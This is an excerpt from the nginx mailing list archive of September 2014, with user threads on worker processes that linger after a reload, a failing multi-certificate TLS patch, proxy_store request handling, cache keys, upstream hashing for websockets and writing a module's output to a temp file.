--http-client-body-temp-path=/var/cache/nginx/client_temp > > > --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx > > > --group=nginx --with-http_flv_module --with-http_mp4_module > > > > You may want to try 1.7.4 to see if it helps (there are some > > potentially related changes in nginx 1.7.3). > > > > If it doesn't, providing debug log may be helpful. See > > http://wiki.nginx.org/Debugging for more hints. 
> > > > -- > > Maxim Dounin > > http://nginx.org/ > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From reallfqq-nginx at yahoo.fr Fri Sep 19 14:55:05 2014 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Fri, 19 Sep 2014 16:55:05 +0200 Subject: Worker processes not shutting down In-Reply-To: References: <8b582656c938132d5f99e41e8aaa817d.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hello, You should read the end of the 1st paragraph of the following section to find your answer: http://nginx.org/en/docs/control.html#reconfiguration If you do not wish to reach all the workers' 'graceful shutdown' conditions, look at the list of signals they handle to find out how to force it: http://nginx.org/en/docs/control.html Happy controlling, --- *B. R.* On Fri, Sep 19, 2014 at 4:13 PM, igorhmm wrote: > Hi, > > Did you solved that problem? I'm with the same issue using nginx/1.4.3. > > Could be related with websockets that are still connected? > > Some browsers can't connect until that worker be killed? This happens for > you too? > > Thanks > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,221591,253418#msg-253418 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From nginx-forum at nginx.us Fri Sep 19 17:27:30 2014 From: nginx-forum at nginx.us (igorhmm) Date: Fri, 19 Sep 2014 13:27:30 -0400 Subject: Worker processes not shutting down In-Reply-To: References: Message-ID: <2398e55c4d0c9361b10c2ca154290ddc.NginxMailingListEnglish@forum.nginx.org> Hi BR, This helps a lot, but I can't find an explanation for my (temporary) problem. About an hour ago one of our developers couldn't access port 80, but everything went fine with https. My nginx listens for http and https on the same server. With the help of tcpdump, we could see packets coming in, but nothing going out. In my newbie understanding, the new workers are ready and have taken over, and the old worker is waiting for all its sockets to close before quitting. Is that it? But why was this user still without a response over http for a long period (more than 20 minutes)? After that, everything went back to working fine. Thanks again Igor Posted at Nginx Forum: http://forum.nginx.org/read.php?2,221591,253428#msg-253428 From reallfqq-nginx at yahoo.fr Fri Sep 19 17:46:17 2014 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Fri, 19 Sep 2014 19:46:17 +0200 Subject: Worker processes not shutting down In-Reply-To: <2398e55c4d0c9361b10c2ca154290ddc.NginxMailingListEnglish@forum.nginx.org> References: <2398e55c4d0c9361b10c2ca154290ddc.NginxMailingListEnglish@forum.nginx.org> Message-ID: Are you able to reproduce the problem? Could you provide steps to do so? Based on what you said, I would suspect a conflict between new and old workers. I do not see in your report where else the problem could come from, so I suppose it is related. Do you know which worker was receiving data? Why did the problem solve itself? Did that happen at the same time as the old workers finally died? What is the difference between handling HTTP and HTTPS in your configuration? Is there any difference on that particular point between the old and new configuration? --- *B.
R.* On Fri, Sep 19, 2014 at 7:27 PM, igorhmm wrote: > Hi BR, > > This helps a lot, but I can't find an explanation for my (temporary) > problem. > > About an hour ago one of our developers couldn't access port 80, but everything > went fine with https. My nginx listens for http and https on the same > server. > > With the help of tcpdump, we could see packets coming in, but nothing going > out. > > In my newbie understanding, the new workers are ready and have taken over, > and the old worker is waiting for all its sockets to close before quitting. Is that it? > > But why was this user still without a response over http for a long period (more > than 20 minutes)? After that, everything went back to working fine. > > Thanks again > > Igor > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,221591,253428#msg-253428 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Sep 19 19:50:24 2014 From: nginx-forum at nginx.us (igorhmm) Date: Fri, 19 Sep 2014 15:50:24 -0400 Subject: Worker processes not shutting down In-Reply-To: References: Message-ID: <5ad514978d0969e11c8b837b866c9f4b.NginxMailingListEnglish@forum.nginx.org> Hi BR, I don't know how to reproduce it, not yet :-) I couldn't identify which worker was responding either, but with strace I can see warnings in the old worker about EAGAIN (Resource temporarily unavailable). I can see that because the old workers are still running: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND nginx 6009 0.0 0.2 71020 18532 ? S Sep18 0:37 nginx: worker process is shutting down nginx 6010 0.0 0.2 71028 18496 ? S Sep18 0:12 nginx: worker process is shutting down nginx 6289 0.2 0.3 75672 23188 ? S 07:54 0:58 nginx: worker process is shutting down nginx 6290 0.0 0.2 71932 19248 ?
S 07:54 0:15 nginx: worker process is shutting down nginx 9182 0.0 0.2 70872 18380 ? S 10:20 0:02 nginx: worker process is shutting down nginx 9295 0.0 0.2 70952 18380 ? S 10:26 0:02 nginx: worker process is shutting down nginx 9297 0.0 0.2 70368 17856 ? S 10:26 0:02 nginx: worker process is shutting down nginx 9302 0.0 0.2 70804 18296 ? S 10:26 0:01 nginx: worker process is shutting down nginx 10132 0.2 0.2 74776 22280 ? S 10:53 0:47 nginx: worker process is shutting down nginx 10133 0.0 0.2 71484 18972 ? S 10:53 0:09 nginx: worker process is shutting down nginx 13690 0.2 0.2 72876 20296 ? S 14:22 0:10 nginx: worker process nginx 13691 0.1 0.2 71492 19088 ? S 14:22 0:07 nginx: worker process nginx 13692 0.0 0.0 57292 3180 ? S 14:22 0:00 nginx: cache manager process root 29863 0.0 0.0 57292 4048 ? Ss Sep11 0:00 nginx: master process /usr/sbin/nginx -c /etc/nginx/nginx.conf nginx 30956 0.0 0.2 72924 20336 ? S Sep18 0:23 nginx: worker process is shutting down Judging by our users' usage, these workers will stay online for a few more hours :) The difference between the old and new configuration is just a "down" flag on one of the servers in our websockets pool (upstream). You can see a simplified version of the config at: http://pastebin.com/02GQQ22r Thanks a lot for your attention. Igor Posted at Nginx Forum: http://forum.nginx.org/read.php?2,221591,253431#msg-253431 From reallfqq-nginx at yahoo.fr Fri Sep 19 20:30:30 2014 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Fri, 19 Sep 2014 22:30:30 +0200 Subject: Worker processes not shutting down In-Reply-To: <5ad514978d0969e11c8b837b866c9f4b.NginxMailingListEnglish@forum.nginx.org> References: <5ad514978d0969e11c8b837b866c9f4b.NginxMailingListEnglish@forum.nginx.org> Message-ID: Any hanging/error should be visible in your log files. Cross-check the access and error logs and you will probably find the unusual entries you are seeking. --- *B.
R.* On Fri, Sep 19, 2014 at 9:50 PM, igorhmm wrote: > Hi BR, > > I don't known how to reproduce, not yet :-) > > I couldn't identify which worker was responding too, but I can see with > strace warnings in the old wolker about EAGAIN (Resource temporarily > unavailable). I can see that because old workers still running: > > USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND > nginx 6009 0.0 0.2 71020 18532 ? S Sep18 0:37 nginx: > worker process is shutting down > nginx 6010 0.0 0.2 71028 18496 ? S Sep18 0:12 nginx: > worker process is shutting down > nginx 6289 0.2 0.3 75672 23188 ? S 07:54 0:58 nginx: > worker process is shutting down > nginx 6290 0.0 0.2 71932 19248 ? S 07:54 0:15 nginx: > worker process is shutting down > nginx 9182 0.0 0.2 70872 18380 ? S 10:20 0:02 nginx: > worker process is shutting down > nginx 9295 0.0 0.2 70952 18380 ? S 10:26 0:02 nginx: > worker process is shutting down > nginx 9297 0.0 0.2 70368 17856 ? S 10:26 0:02 nginx: > worker process is shutting down > nginx 9302 0.0 0.2 70804 18296 ? S 10:26 0:01 nginx: > worker process is shutting down > nginx 10132 0.2 0.2 74776 22280 ? S 10:53 0:47 nginx: > worker process is shutting down > nginx 10133 0.0 0.2 71484 18972 ? S 10:53 0:09 nginx: > worker process is shutting down > nginx 13690 0.2 0.2 72876 20296 ? S 14:22 0:10 nginx: > worker process > nginx 13691 0.1 0.2 71492 19088 ? S 14:22 0:07 nginx: > worker process > nginx 13692 0.0 0.0 57292 3180 ? S 14:22 0:00 nginx: > cache manager process > root 29863 0.0 0.0 57292 4048 ? Ss Sep11 0:00 nginx: > master process /usr/sbin/nginx -c /etc/nginx/nginx.conf > nginx 30956 0.0 0.2 72924 20336 ? S Sep18 0:23 nginx: > worker process is shutting down > [/code] > > Looking for our user's usage, this workers will stay online for more few > hours :) > > The difference between old and new configuration is just a "down" flag in > one of our servers from our websockets pool (upstream). 
You can see a > simplified version of config on: http://pastebin.com/02GQQ22r > > Really thanks for your attention. > > Igor > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,221591,253431#msg-253431 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From oscaretu at gmail.com Sat Sep 20 08:16:49 2014 From: oscaretu at gmail.com (oscaretu .) Date: Sat, 20 Sep 2014 10:16:49 +0200 Subject: Worker processes not shutting down In-Reply-To: <5ad514978d0969e11c8b837b866c9f4b.NginxMailingListEnglish@forum.nginx.org> References: <5ad514978d0969e11c8b837b866c9f4b.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hello As another tool to analyze the problem similar to strace but more powerful, I suggest you to try sysdig http://www.sysdig.org/ https://www.google.com/search?client=ubuntu&channel=fs&q=sysdig&ie=utf-8&oe=utf-8 You can do a trace of everything in your system. Greetings, Oscar On Fri, Sep 19, 2014 at 9:50 PM, igorhmm wrote: > Hi BR, > > I don't known how to reproduce, not yet :-) > > I couldn't identify which worker was responding too, but I can see with > strace warnings in the old wolker about EAGAIN (Resource temporarily > unavailable). I can see that because old workers still running: > > USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND > nginx 6009 0.0 0.2 71020 18532 ? S Sep18 0:37 nginx: > worker process is shutting down > nginx 6010 0.0 0.2 71028 18496 ? S Sep18 0:12 nginx: > worker process is shutting down > nginx 6289 0.2 0.3 75672 23188 ? S 07:54 0:58 nginx: > worker process is shutting down > nginx 6290 0.0 0.2 71932 19248 ? S 07:54 0:15 nginx: > worker process is shutting down > nginx 9182 0.0 0.2 70872 18380 ? S 10:20 0:02 nginx: > worker process is shutting down > nginx 9295 0.0 0.2 70952 18380 ? 
S 10:26 0:02 nginx: > worker process is shutting down > nginx 9297 0.0 0.2 70368 17856 ? S 10:26 0:02 nginx: > worker process is shutting down > nginx 9302 0.0 0.2 70804 18296 ? S 10:26 0:01 nginx: > worker process is shutting down > nginx 10132 0.2 0.2 74776 22280 ? S 10:53 0:47 nginx: > worker process is shutting down > nginx 10133 0.0 0.2 71484 18972 ? S 10:53 0:09 nginx: > worker process is shutting down > nginx 13690 0.2 0.2 72876 20296 ? S 14:22 0:10 nginx: > worker process > nginx 13691 0.1 0.2 71492 19088 ? S 14:22 0:07 nginx: > worker process > nginx 13692 0.0 0.0 57292 3180 ? S 14:22 0:00 nginx: > cache manager process > root 29863 0.0 0.0 57292 4048 ? Ss Sep11 0:00 nginx: > master process /usr/sbin/nginx -c /etc/nginx/nginx.conf > nginx 30956 0.0 0.2 72924 20336 ? S Sep18 0:23 nginx: > worker process is shutting down > [/code] > > Looking for our user's usage, this workers will stay online for more few > hours :) > > The difference between old and new configuration is just a "down" flag in > one of our servers from our websockets pool (upstream). You can see a > simplified version of config on: http://pastebin.com/02GQQ22r > > Really thanks for your attention. > > Igor > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,221591,253431#msg-253431 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- Oscar Fernandez Sierra oscaretu at gmail.com -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From dewanggaba at xtremenitro.org Sat Sep 20 08:19:30 2014 From: dewanggaba at xtremenitro.org (Dewangga) Date: Sat, 20 Sep 2014 15:19:30 +0700 Subject: Worker processes not shutting down In-Reply-To: <5ad514978d0969e11c8b837b866c9f4b.NginxMailingListEnglish@forum.nginx.org> References: <5ad514978d0969e11c8b837b866c9f4b.NginxMailingListEnglish@forum.nginx.org> Message-ID: <541D3892.5090907@xtremenitro.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, Which one do you use to reloading the config? `restart` or `reload` command? On 9/20/2014 02:50, igorhmm wrote: > Hi BR, > > I don't known how to reproduce, not yet :-) > > I couldn't identify which worker was responding too, but I can see > with strace warnings in the old wolker about EAGAIN (Resource > temporarily unavailable). I can see that because old workers still > running: > > USER PID %CPU %MEM VSZ RSS TTY STAT START TIME > COMMAND nginx 6009 0.0 0.2 71020 18532 ? S Sep18 > 0:37 nginx: worker process is shutting down nginx 6010 0.0 > 0.2 71028 18496 ? S Sep18 0:12 nginx: worker process > is shutting down nginx 6289 0.2 0.3 75672 23188 ? S > 07:54 0:58 nginx: worker process is shutting down nginx 6290 > 0.0 0.2 71932 19248 ? S 07:54 0:15 nginx: worker > process is shutting down nginx 9182 0.0 0.2 70872 18380 ? > S 10:20 0:02 nginx: worker process is shutting down nginx > 9295 0.0 0.2 70952 18380 ? S 10:26 0:02 nginx: > worker process is shutting down nginx 9297 0.0 0.2 70368 > 17856 ? S 10:26 0:02 nginx: worker process is shutting > down nginx 9302 0.0 0.2 70804 18296 ? S 10:26 > 0:01 nginx: worker process is shutting down nginx 10132 0.2 > 0.2 74776 22280 ? S 10:53 0:47 nginx: worker process > is shutting down nginx 10133 0.0 0.2 71484 18972 ? S > 10:53 0:09 nginx: worker process is shutting down nginx 13690 > 0.2 0.2 72876 20296 ? S 14:22 0:10 nginx: worker > process nginx 13691 0.1 0.2 71492 19088 ? S 14:22 > 0:07 nginx: worker process nginx 13692 0.0 0.0 57292 3180 ? 
> S 14:22 0:00 nginx: cache manager process root 29863 0.0 > 0.0 57292 4048 ? Ss Sep11 0:00 nginx: master process > /usr/sbin/nginx -c /etc/nginx/nginx.conf nginx 30956 0.0 0.2 > 72924 20336 ? S Sep18 0:23 nginx: worker process is > shutting down [/code] > > Looking for our user's usage, this workers will stay online for > more few hours :) > > The difference between old and new configuration is just a "down" > flag in one of our servers from our websockets pool (upstream). You > can see a simplified version of config on: > http://pastebin.com/02GQQ22r > > Really thanks for your attention. > > Igor > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,221591,253431#msg-253431 > > _______________________________________________ nginx mailing list > nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx > -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.17 (MingW32) iQEcBAEBAgAGBQJUHTiSAAoJEF1+odKB6YIxL7UIAIJjD+FR81E+mFEMNY1YY/5z 5R+8ZX7StDVUMRbCsT6VRY0Z7GRP7rPuAZasQtRM47lQ3nbE9rarFymB4CNmzZYt H3j/qgiJ7Hwq+geMeGez9dXLoFll9/mKJ9op+dvAqL+SSto0fbcOTFWxKF0ycfxb /MdQ/caJhF+ZuITW+qOcM7Clo7lUU1VZ6To0VVQNfbJZFiuC78D+P6PHGZDMzB4m 8zuxyDIbHJTev6XKLv+hZRlG7fgyM09FwH0SACxcsRKr3XF1dsKQE2OBF0bY8oia nAiW6K0jX9tatOkm+Vj47MF0R37A0L4y86ChGYW2DZsB2Fc6HxLAQ0VBza2HvgU= =Fkjc -----END PGP SIGNATURE----- From shmick at riseup.net Sat Sep 20 15:41:13 2014 From: shmick at riseup.net (shmick at riseup.net) Date: Sun, 21 Sep 2014 01:41:13 +1000 Subject: Fwd: Re: [PATCH] RSA+DSA+ECC bundles In-Reply-To: <541C42D9.2000207@comodo.com> References: <5272D269.20203@comodo.com> <541C3B2B.1050002@comodo.com> <541C3F92.1060409@riseup.net> <541C42D9.2000207@comodo.com> Message-ID: <541DA019.6090000@riseup.net> unfortunately this was as far as i got with version git $ patch -p0 < nginx_multiple_certs_and_stapling_V2.patch patching file a/src/event/ngx_event_openssl.c Hunk #1 succeeded at 96 with fuzz 2 (offset 12 lines). Hunk #2 succeeded at 162 (offset 14 lines). 
Hunk #3 FAILED at 191. Hunk #4 FAILED at 236. 2 out of 4 hunks FAILED -- saving rejects to file a/src/event/ngx_event_openssl.c.rej patching file a/src/event/ngx_event_openssl.h Hunk #1 FAILED at 104. Hunk #2 succeeded at 203 (offset 22 lines). 1 out of 2 hunks FAILED -- saving rejects to file a/src/event/ngx_event_openssl.h.rej patching file a/src/event/ngx_event_openssl_stapling.c Hunk #1 FAILED at 11. Hunk #12 succeeded at 1793 (offset 13 lines). 1 out of 12 hunks FAILED -- saving rejects to file a/src/event/ngx_event_openssl_stapling.c.rej patching file a/src/http/modules/ngx_http_ssl_module.c Hunk #1 FAILED at 66. Hunk #2 succeeded at 209 (offset 31 lines). Hunk #3 FAILED at 404. Hunk #4 FAILED at 463. Hunk #5 FAILED at 550. Hunk #6 succeeded at 702 (offset 110 lines). Hunk #7 succeeded at 762 (offset 118 lines). 4 out of 7 hunks FAILED -- saving rejects to file a/src/http/modules/ngx_http_ssl_module.c.rej patching file a/src/http/modules/ngx_http_ssl_module.h Hunk #1 FAILED at 25. 1 out of 1 hunk FAILED -- saving rejects to file a/src/http/modules/ngx_http_ssl_module.h.rej patching file a/src/mail/ngx_mail_ssl_module.c Hunk #1 FAILED at 57. Hunk #2 FAILED at 173. Hunk #3 FAILED at 215. Hunk #4 FAILED at 243. 4 out of 4 hunks FAILED -- saving rejects to file a/src/mail/ngx_mail_ssl_module.c.rej patching file a/src/mail/ngx_mail_ssl_module.h Hunk #1 FAILED at 27. 1 out of 1 hunk FAILED -- saving rejects to file a/src/mail/ngx_mail_ssl_module.h.rej and this was as far as i got with version 1.6.2 just renaming dirs beyond that its all greek to me ... $ patch -p0 < nginx_multiple_certs_and_stapling_V2.patch patching file nginx-1.6.2/src/event/ngx_event_openssl.c Hunk #1 succeeded at 86 with fuzz 2 (offset 2 lines). Hunk #2 succeeded at 150 (offset 2 lines). Hunk #3 FAILED at 191. Hunk #4 succeeded at 240 (offset 4 lines). 
1 out of 4 hunks FAILED -- saving rejects to file nginx-1.6.2/src/event/ngx_event_openssl.c.rej patching file nginx-1.6.2/src/event/ngx_event_openssl.h Hunk #1 succeeded at 108 (offset 4 lines). Hunk #2 succeeded at 191 (offset 6 lines). patching file nginx-1.6.2/src/event/ngx_event_openssl_stapling.c Hunk #1 FAILED at 11. Hunk #12 succeeded at 1791 (offset 11 lines). 1 out of 12 hunks FAILED -- saving rejects to file nginx-1.6.2/src/event/ngx_event_openssl_stapling.c.rej patching file nginx-1.6.2/src/http/modules/ngx_http_ssl_module.c Hunk #1 succeeded at 74 (offset 8 lines). Hunk #2 succeeded at 200 (offset 22 lines). Hunk #3 FAILED at 404. Hunk #4 FAILED at 463. Hunk #5 succeeded at 640 (offset 90 lines). Hunk #6 succeeded at 677 (offset 92 lines). Hunk #7 succeeded at 737 (offset 100 lines). 2 out of 7 hunks FAILED -- saving rejects to file nginx-1.6.2/src/http/modules/ngx_http_ssl_module.c.rej patching file nginx-1.6.2/src/http/modules/ngx_http_ssl_module.h Hunk #1 FAILED at 25. 1 out of 1 hunk FAILED -- saving rejects to file nginx-1.6.2/src/http/modules/ngx_http_ssl_module.h.rej patching file nginx-1.6.2/src/mail/ngx_mail_ssl_module.c Hunk #2 FAILED at 173. Hunk #3 succeeded at 223 (offset 8 lines). Hunk #4 succeeded at 253 (offset 8 lines). 1 out of 4 hunks FAILED -- saving rejects to file nginx-1.6.2/src/mail/ngx_mail_ssl_module.c.rej patching file nginx-1.6.2/src/mail/ngx_mail_ssl_module.h Hunk #1 succeeded at 27 with fuzz 1. Rob Stradling wrote: > On 19/09/14 15:37, shmick at riseup.net wrote: >> many thanks for that rob >> >> this in addition to an already successful boring ssl patch could be >> quite exciting if it works ! > > :-) > >> cheers >> >> Rob Stradling wrote: >>> Patch attached. 
>>> >>> -------- Forwarded Message -------- >>> Subject: Re: [PATCH] RSA+DSA+ECC bundles >>> Date: Thu, 31 Oct 2013 21:58:01 +0000 >>> From: Rob Stradling >>> Reply-To: nginx-devel at nginx.org >>> To: nginx-devel at nginx.org >>> >>> On 31/10/13 20:58, Rob Stradling wrote: >>>> On 24/10/13 01:26, Maxim Dounin wrote: >>>> >>>>> As for multiple certs per se, I don't think it should be limited >>>>> to recent OpenSSL versions only. As far as I can tell, current >>>>> versions of OpenSSL will work just fine (well, mostly) as long as >>>>> both ECDSA and RSA certs use the same certificate chain. I >>>>> believe at least some CAs issue ECDSA certs this way, and this >>>>> should work. >>>>> >>>>> Limiting support for multiple certs with separate certificate >>>>> chains to only recent OpenSSL versions seems reasonable for me, >>>>> but if Rob wants to try to make it work with older versions - I >>>>> don't really object. If it won't be too hacky it might worth >>>>> supporting. >>>> >>>> Updated patch attached. This implements multiple certs and makes OCSP >>>> Stapling work correctly with them. It works with all of the active >>>> OpenSSL branches (including 0_9_8). >>> >>> That patch caused problems with ssl_stapling_file. Fixed in the >>> attached V2 patch. >>> >>>> I'm afraid it's a much larger patch than I anticipated it would be when >>>> I started working on it! >>>> >>>> Maxim, does this patch look commit-able? >>> >> > From nginx-forum at nginx.us Sat Sep 20 19:38:26 2014 From: nginx-forum at nginx.us (jediknight) Date: Sat, 20 Sep 2014 15:38:26 -0400 Subject: nginx chunked transfer encoding, cannot get it to work In-Reply-To: <20140915133623.GM59236@mdounin.ru> References: <20140915133623.GM59236@mdounin.ru> Message-ID: <9c546a4789d4a8d3e967b285a29bef38.NginxMailingListEnglish@forum.nginx.org> Is unbuffered upload going to be implemented for SPDY as well? 
Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253246,253441#msg-253441 From shahzaib.cb at gmail.com Sun Sep 21 09:05:09 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Sun, 21 Sep 2014 14:05:09 +0500 Subject: Forward single request to upstream server via proxy_store !! Message-ID: Hi, When multiple users request the same file on the edge server via proxy_store and the requested file has not yet been downloaded to the edge server, nginx keeps proxying those requests towards the origin server, due to which the network port on the edge server gets saturated and the file download takes 1~2 hours. Is there a way for nginx to forward only a single request towards the origin server and download the requested file, while holding back the other users and only serving them once the file has been successfully downloaded to the edge server? This way the incoming port (nload) on the edge server will not be saturated !! Regards. Shahzaib -------------- next part -------------- An HTML attachment was scrubbed... URL: From r_o_l_a_n_d at hotmail.com Sun Sep 21 13:40:00 2014 From: r_o_l_a_n_d at hotmail.com (Roland RoLaNd) Date: Sun, 21 Sep 2014 16:40:00 +0300 Subject: trouble changing uri to query string In-Reply-To: <20140917071707.GE3771@daoine.org> References: , <20140917071707.GE3771@daoine.org> Message-ID: Thank you Francis for your response, and excuse the late reply. Using map is a cool idea, though i have around 2000 possible imageId and size values and more than 9 million user ids, and the imageIDs are prone to change; wouldn't that mean i have to add them manually every time? On another note, let's say i mapped all the wanted cache keys; how can i force the incoming requests to match that key? i would be stuck with the same dilemma as now, since the uri is missing the "?" and so the arguments are treated not as a query string but as part of the uri itself...
i am currently researching a way to do the following:

location ~* /some/path/rest/v2/
if ^/giveit.view*
set $URI http://mysite.com/some/path/rest/v2/giveit.view?(whatever matched after view)
set $args $args_id$arg_size
set $cache_key $scheme$host$uri$is_args$args;

This would only work if the $args reads from the previously set $URI. this is obviously a pseudo code, but i'm hoping i'm on the right path here... > Date: Wed, 17 Sep 2014 08:17:07 +0100 > From: francis at daoine.org > To: nginx at nginx.org > Subject: Re: trouble changing uri to query string > > On Mon, Sep 15, 2014 at 02:57:34PM +0300, Roland RoLaNd wrote: > > Hi there, > > this is all untested by me... > > > i have a url looking as such: mysite.com/some/path/rest/v2/giveit.view&user=282&imageid=23&size=80 > > > > i want the cache key to match imageid=23&size=80 without the "user" part. > > You could try using "map" to define a variable which is 'the url without > the part that matches "user=[0-9]+&"', and then use that in the cache > key, perhaps? > > > $args isn't matching because incoming url lacks the "?" part, so $uri is detected as mysite.com/some/path/rest/v2/giveit.view&imageid=23&size=80 > > $url probably starts with the character "/". > > > Is there a way i could force nginx to detect that query string, or rewrite/set the args on each request ? > > There is no query string. > > You may find it easier to switch to "standard" http/cgi-like urls. But > that's a separate thing. > > f > -- > Francis Daly francis at daoine.org > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed...
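Francis's "map" suggestion from the quoted reply could be sketched like this. This is a hedged, untested illustration: the regex and the $cache_uri variable name are assumptions, not a tested configuration.

```nginx
# Build a cache-key variable that drops the "user=NNN&" segment from the
# pseudo-query part of the URI (illustrative only; adjust the regex to the
# real URL layout).
map $uri $cache_uri {
    default                                              $uri;
    "~^(?<pre>.*giveit\.view)&user=[0-9]+&(?<post>.*)$"  $pre&$post;
}

proxy_cache_key $scheme$host$cache_uri;
```

Since there is no real query string in these URLs, everything has to be matched out of $uri itself, which is why the map operates on $uri rather than $args.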
URL: From jjohnson at smoothlinux.com Sun Sep 21 23:48:06 2014 From: jjohnson at smoothlinux.com (Jason Johnson) Date: Sun, 21 Sep 2014 18:48:06 -0500 Subject: No Cache Header On Proxy Request Message-ID: <541F63B6.9090300@smoothlinux.com> Hi All, Can someone tell me, or point me to an example of, how to set a no-cache header on a proxied request. Currently I have a PHP application that I'm reverse proxying to php-fpm. However, when I try to post to the login page, the response is being cached by the CDN that I'm using. A no-cache header will fix this issue. I have been able to fix this on the static pages; however, I can't seem to get the header working on a proxied request. Thanks, -Jason -------------- next part -------------- An HTML attachment was scrubbed... URL: From shahzaib.cb at gmail.com Mon Sep 22 19:06:56 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Tue, 23 Sep 2014 00:06:56 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: Message-ID: Is there any way with nginx that i could put a hold on the subsequent requests and proxy only a single request for the same file, in order to prevent filling up the tmp folder? tmp keeps filling up because multiple users are accessing the same file and the file is not downloaded yet. On Sun, Sep 21, 2014 at 2:05 PM, shahzaib shahzaib wrote: > Hi, > > When the multiple users request for same file on edge server via > proxy_store and requested file is still not downloaded on the edge server, > the nginx keeps on proxying those requests towards the origin server due to > which network port is getting saturated on the edge server and file > downloading taking 1~2hours. Is there a way that nginx would forward the > only single request towards the origin server and download the requested > file while holding back the other users and only serve them when the file > is successfully downloaded on the edge server ?
> > This way Incoming port(nload) on edge server will not be saturated !! > > Regards. > Shahzaib > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Tue Sep 23 03:11:08 2014 From: nginx-forum at nginx.us (linbo) Date: Mon, 22 Sep 2014 23:11:08 -0400 Subject: nginx proxy websocket to multi nodes Message-ID: I use nginx as a proxy server; the backends are socketio services. Following the [document](http://socket.io/docs/using-multiple-nodes/), the nginx configuration uses the ip_hash instruction, which indicates that connections will be sticky.

upstream socketio {
    ip_hash;
    server server1:3000;
    server server1:3001;
    server server2:3100;
    server server2:3101;
}

But with this configuration, requests from the same client are always proxied to the same backend server. I want requests from the same client to be spread across different backend servers, so I have tried the [hash directive](http://nginx.org/en/docs/http/ngx_http_upstream_module.html#hash), but it doesn't work:

upstream socketio { hash "${remote_addr}${remote_port}";

Any solution? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253475,253475#msg-253475 From Hung.Nguyen at ambientdigitalgroup.com Tue Sep 23 08:02:15 2014 From: Hung.Nguyen at ambientdigitalgroup.com (Hung Nguyen) Date: Tue, 23 Sep 2014 08:02:15 +0000 Subject: [nginx module] Save response into temp file Message-ID: <24A98BCB-1D9D-4468-BBAB-53947CE57CF7@ambientdigitalgroup.com> Hi, I am working on an nginx module that has this flow: receive user request -> parse request -> read local file -> process file -> response to client This flow is working well. But now we have another requirement.
After processing this file and building the response into an ngx_chain, I want to write the response content into an ngx_temp_file to do another job, and after that return the response to the client: receive user request -> parse request -> read local file -> process file -> save the processed file to temp file -> response to client I use this code to write the file:

ngx_temp_file_t *tf;

tf = ngx_pcalloc(r->pool, sizeof(ngx_temp_file_t));
tf->file.fd = NGX_INVALID_FILE;
tf->file.log = nlog;
tf->path = clcf->client_body_temp_path;
tf->pool = r->pool;
tf->persistent = 1;

rc = ngx_create_temp_file(&tf->file, tf->path, tf->pool, tf->persistent, tf->clean, tf->access);
ngx_write_chain_to_file(&tf->file, m->chain, m->content_length, r->pool);

Files can be written into temporary files with the following names:

-rw------- 1 root root 455712 Sep 23 13:58 0000000001
-rw------- 1 root root 455712 Sep 23 13:58 0000000002
-rw------- 1 root root 2748936 Sep 23 13:58 0000000003
-rw------- 1 root root 2831656 Sep 23 13:58 0000000004
-rw------- 1 root root 2826016 Sep 23 13:58 0000000005
-rw------- 1 root root 1786000 Sep 23 13:58 0000000006

But I cannot read from them. It seems like the content of these files is not just (or not all of) the content that the user's browser receives. Let's say nginx receives the user request http://server.com/document.txt?type=csv : our module will process the original document.txt file to make it csv type, save it to an ngx_temp_file, and return the document.csv file to the client. But the file that was saved into the ngx_temp_file is not a csv file. Please show me what I am doing wrong here. Thanks, - Hung -------------- next part -------------- An HTML attachment was scrubbed...
